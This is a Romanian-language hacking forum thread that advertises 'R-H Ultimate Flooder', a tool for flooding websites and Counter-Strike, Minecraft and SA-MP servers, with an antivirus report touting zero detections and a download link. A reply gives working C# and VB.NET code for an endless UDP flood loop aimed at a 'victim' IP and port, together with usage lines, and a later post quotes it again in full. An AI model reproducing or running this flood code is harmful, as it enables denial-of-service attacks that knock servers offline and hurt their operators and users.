Jump to content
TacTical

R-H Ultimate Flooder

Recommended Posts

coverg.png

Features:

-You can flood websites. "Tested and work"

-You can flood using UDP Flood cs,minecraft,samp servers and others

-Everything is tested and working

VirusScan:

File Info

Report date: 2011-11-19 17:01:29 (GMT 1)

File name: r-h-ultimate-flooder-exe

File size: 215552 bytes

MD5 Hash: 385751201223b48ff2d0453211f1ea2c

SHA1 Hash: c9ce390b640b7a174d1d1d86a907883cb5fd7e3f

Detection rate: 0 on 9 (0%)

Status: CLEAN

Detections

Avast -

AVG -

Avira AntiVir -

ClamAV -

Comodo -

Emsisoft -

F-Prot -

Ikarus -

TrendMicro -

Descarca : Link Here

Link to comment
Share on other sites

Ce texte ironice ai in tine. La ce postezi cois ? Nu te pot intelege de nici o culoare, poate ca da..posturi ?

Am si specificat ca, un alt program face ipvhosting in mai putin de 10 secunde down dar se pare ca tu esti batut in cap ca sa intelegi diferenta.

Si la ce trebuie sa imi spui sa ii dau delete ? Am spus cumva ca il pastrez sau cum ?

Nu ati vad rostul postului deloc. Dai drumu fa in altul.

Link to comment
Share on other sites

=)) Daca nu ma uitam la cat de vechimea topicului, nu realizam prostia...

C#:


int i = 0;
public static string IP;
public static int Port;

private void Bg_DoWork(System.Object sender, System.ComponentModel.DoWorkEventArgs e)
{
IPAddress IpVictima = IPAddress.Parse(IP);
IPEndPoint Victima = new IPEndPoint(IpVictima, Port);
byte[] packet = new byte[1470];
Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);

while (true) {
if (Bg.CancellationPending == true) {
return;
}
try {
socket.SendTo(packet, Victima);
i += 1;
} catch (Exception ex) {
Bg.CancelAsync();
}
}

}
Folosire: Bg.RunWorkerAsync();, respectiv Bg.CancelAsync();

VB:


Dim i As Integer = 0
Public Shared IP As String
Public Shared Port As Integer

Private Sub Bg_DoWork(ByVal sender As System.Object, ByVal e As System.ComponentModel.DoWorkEventArgs) Handles Bg2.DoWork
Dim IpVictima As IPAddress = IPAddress.Parse(IP)
Dim Victima As New IPEndPoint(IpVictima, Port)
Dim packet As Byte() = New Byte(1469) {}
Dim socket As New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)

While True
If Bg.CancellationPending = True Then
Exit Sub
End If
Try
socket.SendTo(packet, Victima)
i += 1
Catch ex As Exception
Bg.CancelAsync()
End Try
End While
End Sub
Folosire: Bg.RunWorkerAsync(), respectiv Bg.CancelAsync()

Cat de greu e sa va faceti si voi unul? ;)

Link to comment
Share on other sites

=)) Daca nu ma uitam la cat de vechimea topicului, nu realizam prostia...

C#:


int i = 0;
public static string IP;
public static int Port;

private void Bg_DoWork(System.Object sender, System.ComponentModel.DoWorkEventArgs e)
{
IPAddress IpVictima = IPAddress.Parse(IP);
IPEndPoint Victima = new IPEndPoint(IpVictima, Port);
byte[] packet = new byte[1470];
Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);

while (true) {
if (Bg.CancellationPending == true) {
return;
}
try {
socket.SendTo(packet, Victima);
i += 1;
} catch (Exception ex) {
Bg.CancelAsync();
}
}

}
Folosire: Bg.RunWorkerAsync();, respectiv Bg.CancelAsync();

VB:


Dim i As Integer = 0
Public Shared IP As String
Public Shared Port As Integer

Private Sub Bg_DoWork(ByVal sender As System.Object, ByVal e As System.ComponentModel.DoWorkEventArgs) Handles Bg2.DoWork
Dim IpVictima As IPAddress = IPAddress.Parse(IP)
Dim Victima As New IPEndPoint(IpVictima, Port)
Dim packet As Byte() = New Byte(1469) {}
Dim socket As New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)

While True
If Bg.CancellationPending = True Then
Exit Sub
End If
Try
socket.SendTo(packet, Victima)
i += 1
Catch ex As Exception
Bg.CancelAsync()
End Try
End While
End Sub
Folosire: Bg.RunWorkerAsync(), respectiv Bg.CancelAsync()

Cat de greu e sa va faceti si voi unul? ;)

Ce butoane trebuie la VB?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...